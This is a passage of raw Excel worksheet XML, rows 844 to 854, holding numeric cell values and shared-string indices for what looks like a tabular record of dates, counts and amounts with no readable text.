      <c r="D844" t="s">
        <v>6538</v>
      </c>
      <c r="E844" t="s">
        <v>121</v>
      </c>
      <c r="F844" t="s">
        <v>6539</v>
      </c>
      <c r="G844" s="1">
        <v>44358</v>
      </c>
      <c r="H844">
        <v>10424</v>
      </c>
      <c r="I844">
        <v>10424</v>
      </c>
      <c r="J844">
        <v>0</v>
      </c>
      <c r="K844">
        <v>0</v>
      </c>
      <c r="L844">
        <v>0</v>
      </c>
      <c r="M844">
        <v>6</v>
      </c>
      <c r="N844">
        <v>0</v>
      </c>
      <c r="O844">
        <v>0</v>
      </c>
      <c r="P844">
        <v>0</v>
      </c>
      <c r="Q844">
        <v>0</v>
      </c>
      <c r="R844">
        <v>0</v>
      </c>
      <c r="S844">
        <v>0</v>
      </c>
      <c r="T844">
        <v>1</v>
      </c>
      <c r="U844">
        <v>0</v>
      </c>
      <c r="V844">
        <v>0</v>
      </c>
      <c r="W844">
        <v>0</v>
      </c>
      <c r="X844">
        <v>6000</v>
      </c>
      <c r="Y844">
        <v>0</v>
      </c>
      <c r="Z844">
        <v>0</v>
      </c>
      <c r="AA844">
        <v>0</v>
      </c>
      <c r="AB844">
        <v>0</v>
      </c>
      <c r="AC844">
        <v>0</v>
      </c>
      <c r="AD844">
        <v>0</v>
      </c>
      <c r="AE844">
        <v>500</v>
      </c>
      <c r="AF844" t="s">
        <v>6540</v>
      </c>
      <c r="AG844">
        <v>63514</v>
      </c>
      <c r="AH844">
        <v>16</v>
      </c>
      <c r="AJ844">
        <v>228</v>
      </c>
      <c r="AK844" t="s">
        <v>6541</v>
      </c>
      <c r="AL844" t="s">
        <v>6542</v>
      </c>
      <c r="AM844" t="s">
        <v>6543</v>
      </c>
      <c r="AN844" t="s">
        <v>68</v>
      </c>
      <c r="AO844">
        <v>2015</v>
      </c>
      <c r="AP844">
        <v>82318075775</v>
      </c>
      <c r="AQ844" t="s">
        <v>6544</v>
      </c>
      <c r="AR844" t="s">
        <v>6540</v>
      </c>
      <c r="AS844" t="s">
        <v>71</v>
      </c>
      <c r="AT844" t="s">
        <v>72</v>
      </c>
      <c r="AU844">
        <v>25</v>
      </c>
      <c r="AV844">
        <v>1</v>
      </c>
      <c r="AW844">
        <v>1</v>
      </c>
      <c r="AX844">
        <v>6</v>
      </c>
      <c r="AY844">
        <v>1</v>
      </c>
      <c r="AZ844">
        <v>1</v>
      </c>
      <c r="BA844" t="s">
        <v>17220</v>
      </c>
      <c r="BB844" t="s">
        <v>17248</v>
      </c>
      <c r="BC844" t="s">
        <v>13710</v>
      </c>
      <c r="BD844">
        <v>0</v>
      </c>
    </row>
    <row r="845" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A845">
        <v>2009</v>
      </c>
      <c r="B845" t="s">
        <v>6545</v>
      </c>
      <c r="C845" t="s">
        <v>318</v>
      </c>
      <c r="D845" t="s">
        <v>6546</v>
      </c>
      <c r="E845" t="s">
        <v>111</v>
      </c>
      <c r="F845" t="s">
        <v>6547</v>
      </c>
      <c r="G845" s="1">
        <v>44315</v>
      </c>
      <c r="H845">
        <v>10472</v>
      </c>
      <c r="I845">
        <v>10472</v>
      </c>
      <c r="J845">
        <v>1</v>
      </c>
      <c r="K845">
        <v>1</v>
      </c>
      <c r="L845">
        <v>1</v>
      </c>
      <c r="M845">
        <v>0</v>
      </c>
      <c r="N845">
        <v>0</v>
      </c>
      <c r="O845">
        <v>0</v>
      </c>
      <c r="P845">
        <v>0</v>
      </c>
      <c r="Q845">
        <v>0</v>
      </c>
      <c r="R845">
        <v>0</v>
      </c>
      <c r="S845">
        <v>0</v>
      </c>
      <c r="T845">
        <v>0</v>
      </c>
      <c r="U845">
        <v>150000</v>
      </c>
      <c r="V845">
        <v>10000</v>
      </c>
      <c r="W845">
        <v>3000</v>
      </c>
      <c r="X845">
        <v>0</v>
      </c>
      <c r="Y845">
        <v>0</v>
      </c>
      <c r="Z845">
        <v>0</v>
      </c>
      <c r="AA845">
        <v>0</v>
      </c>
      <c r="AB845">
        <v>0</v>
      </c>
      <c r="AC845">
        <v>0</v>
      </c>
      <c r="AD845">
        <v>0</v>
      </c>
      <c r="AE845">
        <v>0</v>
      </c>
      <c r="AF845" t="s">
        <v>6548</v>
      </c>
      <c r="AG845">
        <v>90242</v>
      </c>
      <c r="AH845">
        <v>26</v>
      </c>
      <c r="AJ845">
        <v>420</v>
      </c>
      <c r="AK845" t="s">
        <v>936</v>
      </c>
      <c r="AL845" t="s">
        <v>937</v>
      </c>
      <c r="AM845" t="s">
        <v>6549</v>
      </c>
      <c r="AN845" t="s">
        <v>82</v>
      </c>
      <c r="AO845">
        <v>2000</v>
      </c>
      <c r="AP845" t="s">
        <v>6550</v>
      </c>
      <c r="AQ845" t="s">
        <v>6551</v>
      </c>
      <c r="AR845" t="s">
        <v>6552</v>
      </c>
      <c r="AS845" t="s">
        <v>71</v>
      </c>
      <c r="AT845" t="s">
        <v>86</v>
      </c>
      <c r="AU845">
        <v>38</v>
      </c>
      <c r="AV845">
        <v>43</v>
      </c>
      <c r="AW845">
        <v>11</v>
      </c>
      <c r="AX845">
        <v>31</v>
      </c>
      <c r="AY845">
        <v>27</v>
      </c>
      <c r="AZ845">
        <v>12</v>
      </c>
      <c r="BA845" t="s">
        <v>17042</v>
      </c>
      <c r="BB845" t="s">
        <v>15172</v>
      </c>
      <c r="BC845">
        <v>0</v>
      </c>
      <c r="BD845" t="s">
        <v>13719</v>
      </c>
    </row>
    <row r="846" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A846">
        <v>1732</v>
      </c>
      <c r="B846" t="s">
        <v>6553</v>
      </c>
      <c r="C846" t="s">
        <v>318</v>
      </c>
      <c r="D846" t="s">
        <v>6554</v>
      </c>
      <c r="E846" t="s">
        <v>363</v>
      </c>
      <c r="F846" t="s">
        <v>364</v>
      </c>
      <c r="G846" s="1">
        <v>44321</v>
      </c>
      <c r="H846">
        <v>10565</v>
      </c>
      <c r="I846">
        <v>10565</v>
      </c>
      <c r="J846">
        <v>0</v>
      </c>
      <c r="K846">
        <v>0</v>
      </c>
      <c r="L846">
        <v>0</v>
      </c>
      <c r="M846">
        <v>0</v>
      </c>
      <c r="N846">
        <v>0</v>
      </c>
      <c r="O846">
        <v>0</v>
      </c>
      <c r="P846">
        <v>0</v>
      </c>
      <c r="Q846">
        <v>0</v>
      </c>
      <c r="R846">
        <v>0</v>
      </c>
      <c r="S846">
        <v>1</v>
      </c>
      <c r="T846">
        <v>1</v>
      </c>
      <c r="U846">
        <v>0</v>
      </c>
      <c r="V846">
        <v>0</v>
      </c>
      <c r="W846">
        <v>0</v>
      </c>
      <c r="X846">
        <v>0</v>
      </c>
      <c r="Y846">
        <v>0</v>
      </c>
      <c r="Z846">
        <v>0</v>
      </c>
      <c r="AA846">
        <v>0</v>
      </c>
      <c r="AB846">
        <v>0</v>
      </c>
      <c r="AC846">
        <v>0</v>
      </c>
      <c r="AD846">
        <v>1</v>
      </c>
      <c r="AE846">
        <v>300000</v>
      </c>
      <c r="AF846" t="s">
        <v>6555</v>
      </c>
      <c r="AG846">
        <v>90245</v>
      </c>
      <c r="AH846">
        <v>26</v>
      </c>
      <c r="AJ846">
        <v>420</v>
      </c>
      <c r="AK846" t="s">
        <v>936</v>
      </c>
      <c r="AL846" t="s">
        <v>2680</v>
      </c>
      <c r="AM846" t="s">
        <v>6556</v>
      </c>
      <c r="AN846" t="s">
        <v>55</v>
      </c>
      <c r="AO846">
        <v>2013</v>
      </c>
      <c r="AP846" t="s">
        <v>6557</v>
      </c>
      <c r="AQ846" t="s">
        <v>6558</v>
      </c>
      <c r="AR846" t="s">
        <v>6555</v>
      </c>
      <c r="AS846" t="s">
        <v>371</v>
      </c>
      <c r="AT846" t="s">
        <v>58</v>
      </c>
      <c r="AU846">
        <v>25</v>
      </c>
      <c r="AV846">
        <v>1</v>
      </c>
      <c r="AW846">
        <v>6</v>
      </c>
      <c r="AX846">
        <v>4</v>
      </c>
      <c r="AY846">
        <v>13</v>
      </c>
      <c r="AZ846">
        <v>7</v>
      </c>
      <c r="BA846" t="s">
        <v>16982</v>
      </c>
      <c r="BB846" t="s">
        <v>15481</v>
      </c>
      <c r="BC846">
        <v>0</v>
      </c>
      <c r="BD846" t="s">
        <v>13892</v>
      </c>
    </row>
    <row r="847" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A847">
        <v>1850</v>
      </c>
      <c r="B847" t="s">
        <v>6559</v>
      </c>
      <c r="C847" t="s">
        <v>157</v>
      </c>
      <c r="D847" t="s">
        <v>6560</v>
      </c>
      <c r="E847" t="s">
        <v>944</v>
      </c>
      <c r="F847" t="s">
        <v>2407</v>
      </c>
      <c r="G847" s="1">
        <v>44323</v>
      </c>
      <c r="H847">
        <v>10636</v>
      </c>
      <c r="I847">
        <v>10636</v>
      </c>
      <c r="J847">
        <v>0</v>
      </c>
      <c r="K847">
        <v>2</v>
      </c>
      <c r="L847">
        <v>0</v>
      </c>
      <c r="M847">
        <v>0</v>
      </c>
      <c r="N847">
        <v>0</v>
      </c>
      <c r="O847">
        <v>0</v>
      </c>
      <c r="P847">
        <v>3</v>
      </c>
      <c r="Q847">
        <v>0</v>
      </c>
      <c r="R847">
        <v>0</v>
      </c>
      <c r="S847">
        <v>2</v>
      </c>
      <c r="T847">
        <v>1</v>
      </c>
      <c r="U847">
        <v>0</v>
      </c>
      <c r="V847">
        <v>60000</v>
      </c>
      <c r="W847">
        <v>0</v>
      </c>
      <c r="X847">
        <v>0</v>
      </c>
      <c r="Y847">
        <v>0</v>
      </c>
      <c r="Z847">
        <v>0</v>
      </c>
      <c r="AA847">
        <v>3600</v>
      </c>
      <c r="AB847">
        <v>0</v>
      </c>
      <c r="AC847">
        <v>0</v>
      </c>
      <c r="AD847">
        <v>600</v>
      </c>
      <c r="AE847">
        <v>0</v>
      </c>
      <c r="AF847" t="s">
        <v>6561</v>
      </c>
      <c r="AG847">
        <v>67129</v>
      </c>
      <c r="AH847">
        <v>16</v>
      </c>
      <c r="AJ847">
        <v>261</v>
      </c>
      <c r="AK847" t="s">
        <v>6562</v>
      </c>
      <c r="AL847" t="s">
        <v>6563</v>
      </c>
      <c r="AM847" t="s">
        <v>6564</v>
      </c>
      <c r="AN847" t="s">
        <v>55</v>
      </c>
      <c r="AO847">
        <v>2019</v>
      </c>
      <c r="AP847" t="s">
        <v>6565</v>
      </c>
      <c r="AQ847" t="s">
        <v>6566</v>
      </c>
      <c r="AR847" t="s">
        <v>6561</v>
      </c>
      <c r="AS847" t="s">
        <v>71</v>
      </c>
      <c r="AT847" t="s">
        <v>58</v>
      </c>
      <c r="AU847">
        <v>25</v>
      </c>
      <c r="AV847">
        <v>0</v>
      </c>
      <c r="AW847">
        <v>37</v>
      </c>
      <c r="AX847">
        <v>121</v>
      </c>
      <c r="AY847">
        <v>2</v>
      </c>
      <c r="AZ847">
        <v>1</v>
      </c>
      <c r="BA847" t="s">
        <v>17013</v>
      </c>
      <c r="BB847" t="s">
        <v>15552</v>
      </c>
      <c r="BC847">
        <v>0</v>
      </c>
      <c r="BD847" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="848" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A848">
        <v>1768</v>
      </c>
      <c r="B848" t="s">
        <v>6567</v>
      </c>
      <c r="C848" t="s">
        <v>99</v>
      </c>
      <c r="D848" t="s">
        <v>6568</v>
      </c>
      <c r="E848" t="s">
        <v>363</v>
      </c>
      <c r="F848" t="s">
        <v>6569</v>
      </c>
      <c r="G848" s="1">
        <v>44323</v>
      </c>
      <c r="H848">
        <v>10680</v>
      </c>
      <c r="I848">
        <v>10680</v>
      </c>
      <c r="J848">
        <v>0</v>
      </c>
      <c r="K848">
        <v>0</v>
      </c>
      <c r="L848">
        <v>0</v>
      </c>
      <c r="M848">
        <v>0</v>
      </c>
      <c r="N848">
        <v>0</v>
      </c>
      <c r="O848">
        <v>0</v>
      </c>
      <c r="P848">
        <v>0</v>
      </c>
      <c r="Q848">
        <v>1</v>
      </c>
      <c r="R848">
        <v>0</v>
      </c>
      <c r="S848">
        <v>0</v>
      </c>
      <c r="T848">
        <v>1</v>
      </c>
      <c r="U848">
        <v>0</v>
      </c>
      <c r="V848">
        <v>0</v>
      </c>
      <c r="W848">
        <v>0</v>
      </c>
      <c r="X848">
        <v>0</v>
      </c>
      <c r="Y848">
        <v>0</v>
      </c>
      <c r="Z848">
        <v>0</v>
      </c>
      <c r="AA848">
        <v>0</v>
      </c>
      <c r="AB848">
        <v>200</v>
      </c>
      <c r="AC848">
        <v>0</v>
      </c>
      <c r="AD848">
        <v>0</v>
      </c>
      <c r="AE848">
        <v>500</v>
      </c>
      <c r="AF848" t="s">
        <v>6570</v>
      </c>
      <c r="AG848">
        <v>14340</v>
      </c>
      <c r="AH848">
        <v>12</v>
      </c>
      <c r="AJ848">
        <v>160</v>
      </c>
      <c r="AK848" t="s">
        <v>268</v>
      </c>
      <c r="AL848" t="s">
        <v>6571</v>
      </c>
      <c r="AM848" t="s">
        <v>6572</v>
      </c>
      <c r="AN848" t="s">
        <v>55</v>
      </c>
      <c r="AO848">
        <v>2018</v>
      </c>
      <c r="AP848" t="s">
        <v>6573</v>
      </c>
      <c r="AQ848" t="s">
        <v>6574</v>
      </c>
      <c r="AR848" t="s">
        <v>6570</v>
      </c>
      <c r="AS848" t="s">
        <v>71</v>
      </c>
      <c r="AT848" t="s">
        <v>58</v>
      </c>
      <c r="AU848">
        <v>0</v>
      </c>
      <c r="AV848">
        <v>0</v>
      </c>
      <c r="AW848">
        <v>4</v>
      </c>
      <c r="AX848">
        <v>5</v>
      </c>
      <c r="AY848">
        <v>9</v>
      </c>
      <c r="AZ848">
        <v>7</v>
      </c>
      <c r="BA848" t="s">
        <v>16990</v>
      </c>
      <c r="BB848" t="s">
        <v>15499</v>
      </c>
      <c r="BC848" t="s">
        <v>10031</v>
      </c>
      <c r="BD848" t="s">
        <v>13956</v>
      </c>
    </row>
    <row r="849" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A849">
        <v>1767</v>
      </c>
      <c r="B849" t="s">
        <v>6575</v>
      </c>
      <c r="C849" t="s">
        <v>157</v>
      </c>
      <c r="D849" t="s">
        <v>6576</v>
      </c>
      <c r="E849" t="s">
        <v>142</v>
      </c>
      <c r="F849" t="s">
        <v>6577</v>
      </c>
      <c r="G849" s="1">
        <v>44358</v>
      </c>
      <c r="H849">
        <v>10686</v>
      </c>
      <c r="I849">
        <v>10686</v>
      </c>
      <c r="J849">
        <v>2</v>
      </c>
      <c r="K849">
        <v>0</v>
      </c>
      <c r="L849">
        <v>1</v>
      </c>
      <c r="M849">
        <v>0</v>
      </c>
      <c r="N849">
        <v>0</v>
      </c>
      <c r="O849">
        <v>0</v>
      </c>
      <c r="P849">
        <v>0</v>
      </c>
      <c r="Q849">
        <v>0</v>
      </c>
      <c r="R849">
        <v>4</v>
      </c>
      <c r="S849">
        <v>0</v>
      </c>
      <c r="T849">
        <v>1</v>
      </c>
      <c r="U849">
        <v>30000</v>
      </c>
      <c r="V849">
        <v>0</v>
      </c>
      <c r="W849">
        <v>500</v>
      </c>
      <c r="X849">
        <v>0</v>
      </c>
      <c r="Y849">
        <v>0</v>
      </c>
      <c r="Z849">
        <v>0</v>
      </c>
      <c r="AA849">
        <v>0</v>
      </c>
      <c r="AB849">
        <v>0</v>
      </c>
      <c r="AC849">
        <v>400</v>
      </c>
      <c r="AD849">
        <v>0</v>
      </c>
      <c r="AE849">
        <v>5000</v>
      </c>
      <c r="AF849" t="s">
        <v>6578</v>
      </c>
      <c r="AG849">
        <v>67154</v>
      </c>
      <c r="AH849">
        <v>16</v>
      </c>
      <c r="AJ849">
        <v>241</v>
      </c>
      <c r="AK849" t="s">
        <v>539</v>
      </c>
      <c r="AL849" t="s">
        <v>6579</v>
      </c>
      <c r="AM849" t="s">
        <v>6580</v>
      </c>
      <c r="AN849" t="s">
        <v>55</v>
      </c>
      <c r="AO849">
        <v>2013</v>
      </c>
      <c r="AP849">
        <v>81357100856</v>
      </c>
      <c r="AQ849" t="s">
        <v>6581</v>
      </c>
      <c r="AR849" t="s">
        <v>6582</v>
      </c>
      <c r="AS849" t="s">
        <v>71</v>
      </c>
      <c r="AT849" t="s">
        <v>58</v>
      </c>
      <c r="AU849">
        <v>21</v>
      </c>
      <c r="AV849">
        <v>1</v>
      </c>
      <c r="AW849">
        <v>1</v>
      </c>
      <c r="AX849">
        <v>17</v>
      </c>
      <c r="AY849">
        <v>2</v>
      </c>
      <c r="AZ849">
        <v>3</v>
      </c>
      <c r="BA849" t="s">
        <v>17714</v>
      </c>
      <c r="BB849">
        <v>0</v>
      </c>
      <c r="BC849" t="s">
        <v>13803</v>
      </c>
      <c r="BD849">
        <v>0</v>
      </c>
    </row>
    <row r="850" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A850">
        <v>1845</v>
      </c>
      <c r="B850" t="s">
        <v>6583</v>
      </c>
      <c r="C850" t="s">
        <v>157</v>
      </c>
      <c r="D850" t="s">
        <v>6584</v>
      </c>
      <c r="E850" t="s">
        <v>412</v>
      </c>
      <c r="F850" t="s">
        <v>6585</v>
      </c>
      <c r="G850" s="1">
        <v>44354</v>
      </c>
      <c r="H850">
        <v>10752</v>
      </c>
      <c r="I850">
        <v>10752</v>
      </c>
      <c r="J850">
        <v>1</v>
      </c>
      <c r="K850">
        <v>0</v>
      </c>
      <c r="L850">
        <v>5</v>
      </c>
      <c r="M850">
        <v>3</v>
      </c>
      <c r="N850">
        <v>0</v>
      </c>
      <c r="O850">
        <v>0</v>
      </c>
      <c r="P850">
        <v>0</v>
      </c>
      <c r="Q850">
        <v>0</v>
      </c>
      <c r="R850">
        <v>0</v>
      </c>
      <c r="S850">
        <v>0</v>
      </c>
      <c r="T850">
        <v>2</v>
      </c>
      <c r="U850">
        <v>600</v>
      </c>
      <c r="V850">
        <v>0</v>
      </c>
      <c r="W850">
        <v>5000</v>
      </c>
      <c r="X850">
        <v>1000</v>
      </c>
      <c r="Y850">
        <v>0</v>
      </c>
      <c r="Z850">
        <v>0</v>
      </c>
      <c r="AA850">
        <v>0</v>
      </c>
      <c r="AB850">
        <v>0</v>
      </c>
      <c r="AC850">
        <v>0</v>
      </c>
      <c r="AD850">
        <v>0</v>
      </c>
      <c r="AE850">
        <v>3000</v>
      </c>
      <c r="AF850" t="s">
        <v>6586</v>
      </c>
      <c r="AG850">
        <v>67154</v>
      </c>
      <c r="AH850">
        <v>16</v>
      </c>
      <c r="AJ850">
        <v>241</v>
      </c>
      <c r="AK850" t="s">
        <v>539</v>
      </c>
      <c r="AL850" t="s">
        <v>6587</v>
      </c>
      <c r="AM850" t="s">
        <v>6588</v>
      </c>
      <c r="AN850" t="s">
        <v>82</v>
      </c>
      <c r="AO850">
        <v>1986</v>
      </c>
      <c r="AP850" t="s">
        <v>6589</v>
      </c>
      <c r="AQ850" t="s">
        <v>6590</v>
      </c>
      <c r="AR850" t="s">
        <v>6591</v>
      </c>
      <c r="AS850" t="s">
        <v>71</v>
      </c>
      <c r="AT850" t="s">
        <v>86</v>
      </c>
      <c r="AU850">
        <v>26</v>
      </c>
      <c r="AV850">
        <v>1</v>
      </c>
      <c r="AW850">
        <v>44</v>
      </c>
      <c r="AX850">
        <v>38</v>
      </c>
      <c r="AY850">
        <v>24</v>
      </c>
      <c r="AZ850">
        <v>9</v>
      </c>
      <c r="BA850" t="s">
        <v>17010</v>
      </c>
      <c r="BB850" t="s">
        <v>15547</v>
      </c>
      <c r="BC850">
        <v>0</v>
      </c>
      <c r="BD850" t="s">
        <v>13844</v>
      </c>
    </row>
    <row r="851" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A851">
        <v>2231</v>
      </c>
      <c r="B851" t="s">
        <v>6592</v>
      </c>
      <c r="C851" t="s">
        <v>2308</v>
      </c>
      <c r="D851" t="s">
        <v>6593</v>
      </c>
      <c r="E851" t="s">
        <v>142</v>
      </c>
      <c r="F851" t="s">
        <v>6594</v>
      </c>
      <c r="G851" s="1">
        <v>44323</v>
      </c>
      <c r="H851">
        <v>10795</v>
      </c>
      <c r="I851">
        <v>10795</v>
      </c>
      <c r="J851">
        <v>2</v>
      </c>
      <c r="K851">
        <v>0</v>
      </c>
      <c r="L851">
        <v>3</v>
      </c>
      <c r="M851">
        <v>0</v>
      </c>
      <c r="N851">
        <v>0</v>
      </c>
      <c r="O851">
        <v>0</v>
      </c>
      <c r="P851">
        <v>0</v>
      </c>
      <c r="Q851">
        <v>5</v>
      </c>
      <c r="R851">
        <v>10</v>
      </c>
      <c r="S851">
        <v>1</v>
      </c>
      <c r="T851">
        <v>1</v>
      </c>
      <c r="U851">
        <v>180000</v>
      </c>
      <c r="V851">
        <v>0</v>
      </c>
      <c r="W851">
        <v>15000</v>
      </c>
      <c r="X851">
        <v>0</v>
      </c>
      <c r="Y851">
        <v>0</v>
      </c>
      <c r="Z851">
        <v>0</v>
      </c>
      <c r="AA851">
        <v>0</v>
      </c>
      <c r="AB851">
        <v>5000</v>
      </c>
      <c r="AC851">
        <v>2500</v>
      </c>
      <c r="AD851">
        <v>1</v>
      </c>
      <c r="AE851">
        <v>5000</v>
      </c>
      <c r="AF851" t="s">
        <v>6595</v>
      </c>
      <c r="AG851">
        <v>98415</v>
      </c>
      <c r="AH851">
        <v>33</v>
      </c>
      <c r="AJ851">
        <v>485</v>
      </c>
      <c r="AK851" t="s">
        <v>2313</v>
      </c>
      <c r="AL851" t="s">
        <v>2314</v>
      </c>
      <c r="AM851" t="s">
        <v>6596</v>
      </c>
      <c r="AN851" t="s">
        <v>55</v>
      </c>
      <c r="AO851">
        <v>2013</v>
      </c>
      <c r="AP851">
        <v>81216332372</v>
      </c>
      <c r="AQ851" t="s">
        <v>6597</v>
      </c>
      <c r="AR851" t="s">
        <v>6595</v>
      </c>
      <c r="AS851" t="s">
        <v>71</v>
      </c>
      <c r="AT851" t="s">
        <v>58</v>
      </c>
      <c r="AU851">
        <v>20</v>
      </c>
      <c r="AV851">
        <v>1</v>
      </c>
      <c r="AW851">
        <v>4</v>
      </c>
      <c r="AX851">
        <v>0</v>
      </c>
      <c r="AY851">
        <v>4</v>
      </c>
      <c r="AZ851">
        <v>1</v>
      </c>
      <c r="BA851" t="s">
        <v>17091</v>
      </c>
      <c r="BB851" t="s">
        <v>15777</v>
      </c>
      <c r="BC851" t="s">
        <v>9693</v>
      </c>
      <c r="BD851" t="s">
        <v>9934</v>
      </c>
    </row>
    <row r="852" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A852">
        <v>2164</v>
      </c>
      <c r="B852" t="s">
        <v>6598</v>
      </c>
      <c r="C852" t="s">
        <v>4653</v>
      </c>
      <c r="D852" t="s">
        <v>6599</v>
      </c>
      <c r="E852" t="s">
        <v>916</v>
      </c>
      <c r="F852" t="s">
        <v>6600</v>
      </c>
      <c r="G852" s="1">
        <v>44351</v>
      </c>
      <c r="H852">
        <v>10811</v>
      </c>
      <c r="I852">
        <v>10811</v>
      </c>
      <c r="J852">
        <v>0</v>
      </c>
      <c r="K852">
        <v>0</v>
      </c>
      <c r="L852">
        <v>0</v>
      </c>
      <c r="M852">
        <v>0</v>
      </c>
      <c r="N852">
        <v>0</v>
      </c>
      <c r="O852">
        <v>0</v>
      </c>
      <c r="P852">
        <v>0</v>
      </c>
      <c r="Q852">
        <v>0</v>
      </c>
      <c r="R852">
        <v>0</v>
      </c>
      <c r="S852">
        <v>0</v>
      </c>
      <c r="T852">
        <v>1</v>
      </c>
      <c r="U852">
        <v>0</v>
      </c>
      <c r="V852">
        <v>0</v>
      </c>
      <c r="W852">
        <v>0</v>
      </c>
      <c r="X852">
        <v>0</v>
      </c>
      <c r="Y852">
        <v>0</v>
      </c>
      <c r="Z852">
        <v>0</v>
      </c>
      <c r="AA852">
        <v>0</v>
      </c>
      <c r="AB852">
        <v>0</v>
      </c>
      <c r="AC852">
        <v>0</v>
      </c>
      <c r="AD852">
        <v>0</v>
      </c>
      <c r="AE852">
        <v>10</v>
      </c>
      <c r="AF852" t="s">
        <v>6601</v>
      </c>
      <c r="AG852">
        <v>36129</v>
      </c>
      <c r="AH852">
        <v>7</v>
      </c>
      <c r="AJ852">
        <v>97</v>
      </c>
      <c r="AK852" t="s">
        <v>6602</v>
      </c>
      <c r="AL852" t="s">
        <v>6603</v>
      </c>
      <c r="AM852" t="s">
        <v>6604</v>
      </c>
      <c r="AN852" t="s">
        <v>55</v>
      </c>
      <c r="AO852">
        <v>2006</v>
      </c>
      <c r="AP852">
        <v>85383223317</v>
      </c>
      <c r="AQ852" t="s">
        <v>6605</v>
      </c>
      <c r="AR852" t="s">
        <v>6601</v>
      </c>
      <c r="AS852" t="s">
        <v>71</v>
      </c>
      <c r="AT852" t="s">
        <v>72</v>
      </c>
      <c r="AU852">
        <v>25</v>
      </c>
      <c r="AV852">
        <v>1</v>
      </c>
      <c r="AW852">
        <v>0</v>
      </c>
      <c r="AX852">
        <v>0</v>
      </c>
      <c r="AY852">
        <v>1</v>
      </c>
      <c r="AZ852">
        <v>6</v>
      </c>
      <c r="BA852" t="s">
        <v>15739</v>
      </c>
      <c r="BB852" t="s">
        <v>15738</v>
      </c>
      <c r="BC852" t="s">
        <v>9791</v>
      </c>
      <c r="BD852">
        <v>0</v>
      </c>
    </row>
    <row r="853" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A853">
        <v>1779</v>
      </c>
      <c r="B853" t="s">
        <v>6606</v>
      </c>
      <c r="C853" t="s">
        <v>47</v>
      </c>
      <c r="D853" t="s">
        <v>6607</v>
      </c>
      <c r="E853" t="s">
        <v>101</v>
      </c>
      <c r="F853" t="s">
        <v>6608</v>
      </c>
      <c r="G853" s="1">
        <v>44364</v>
      </c>
      <c r="H853">
        <v>10838</v>
      </c>
      <c r="I853">
        <v>10838</v>
      </c>
      <c r="J853">
        <v>1</v>
      </c>
      <c r="K853">
        <v>0</v>
      </c>
      <c r="L853">
        <v>0</v>
      </c>
      <c r="M853">
        <v>0</v>
      </c>
      <c r="N853">
        <v>0</v>
      </c>
      <c r="O853">
        <v>0</v>
      </c>
      <c r="P853">
        <v>0</v>
      </c>
      <c r="Q853">
        <v>1</v>
      </c>
      <c r="R853">
        <v>1</v>
      </c>
      <c r="S853">
        <v>0</v>
      </c>
      <c r="T853">
        <v>1</v>
      </c>
      <c r="U853">
        <v>400000</v>
      </c>
      <c r="V853">
        <v>0</v>
      </c>
      <c r="W853">
        <v>0</v>
      </c>
      <c r="X853">
        <v>0</v>
      </c>
      <c r="Y853">
        <v>0</v>
      </c>
      <c r="Z853">
        <v>0</v>
      </c>
      <c r="AA853">
        <v>0</v>
      </c>
      <c r="AB853">
        <v>500</v>
      </c>
      <c r="AC853">
        <v>1000</v>
      </c>
      <c r="AD853">
        <v>0</v>
      </c>
      <c r="AE853">
        <v>25000</v>
      </c>
      <c r="AF853" t="s">
        <v>6187</v>
      </c>
      <c r="AG853">
        <v>20250</v>
      </c>
      <c r="AH853">
        <v>2</v>
      </c>
      <c r="AJ853">
        <v>53</v>
      </c>
      <c r="AK853" t="s">
        <v>3055</v>
      </c>
      <c r="AL853" t="s">
        <v>3056</v>
      </c>
      <c r="AM853" t="s">
        <v>6609</v>
      </c>
      <c r="AN853" t="s">
        <v>55</v>
      </c>
      <c r="AO853">
        <v>2015</v>
      </c>
      <c r="AP853">
        <v>81396392387</v>
      </c>
      <c r="AQ853" t="s">
        <v>6610</v>
      </c>
      <c r="AR853" t="s">
        <v>6187</v>
      </c>
      <c r="AS853" t="s">
        <v>179</v>
      </c>
      <c r="AT853" t="s">
        <v>58</v>
      </c>
      <c r="AU853">
        <v>0</v>
      </c>
      <c r="AV853">
        <v>0</v>
      </c>
      <c r="AW853">
        <v>15</v>
      </c>
      <c r="AX853">
        <v>30</v>
      </c>
      <c r="AY853">
        <v>3</v>
      </c>
      <c r="AZ853">
        <v>4</v>
      </c>
      <c r="BA853" t="s">
        <v>16994</v>
      </c>
      <c r="BB853" t="s">
        <v>15506</v>
      </c>
      <c r="BC853">
        <v>0</v>
      </c>
      <c r="BD853" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="854" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A854">
        <v>1804</v>
      </c>
      <c r="B854" t="s">
        <v>6611</v>
      </c>
      <c r="C854" t="s">
        <v>5506</v>
      </c>
      <c r="D854" t="s">
        <v>6612</v>
      </c>
      <c r="E854" t="s">
        <v>111</v>
      </c>
      <c r="F854" t="s">
        <v>6613</v>
      </c>
      <c r="G854" s="1">
        <v>44379</v>
      </c>
      <c r="H854">
        <v>10958</v>
      </c>
      <c r="I854">
        <v>10958</v>
      </c>
      <c r="J854">
        <v>3</v>
      </c>
      <c r="K854">
        <v>2</v>
      </c>
      <c r="L854">
        <v>2</v>
      </c>
      <c r="M854">
        <v>0</v>
      </c>
      <c r="N854">
        <v>0</v>
      </c>
      <c r="O854">
        <v>2</v>
      </c>
      <c r="P854">
        <v>0</v>
      </c>
      <c r="Q854">
        <v>3</v>
      </c>
      <c r="R854">
        <v>2</v>
      </c>
      <c r="S854">
        <v>1</v>
      </c>
      <c r="T854">
        <v>3</v>
      </c>
      <c r="U854">
        <v>50000</v>
      </c>
      <c r="V854">
        <v>2</v>
      </c>
      <c r="W854">
        <v>10000</v>
      </c>
      <c r="X854">
        <v>0</v>
      </c>
      <c r="Y854">
        <v>0</v>
      </c>
      <c r="Z854">
        <v>2</v>
      </c>
      <c r="AA854">
        <v>0</v>
      </c>
      <c r="AB854">
        <v>100</v>
      </c>
      <c r="AC854">
        <v>1000</v>
      </c>
      <c r="AD854">
        <v>1</v>
      </c>
      <c r="AE854">
        <v>1000</v>
      </c>
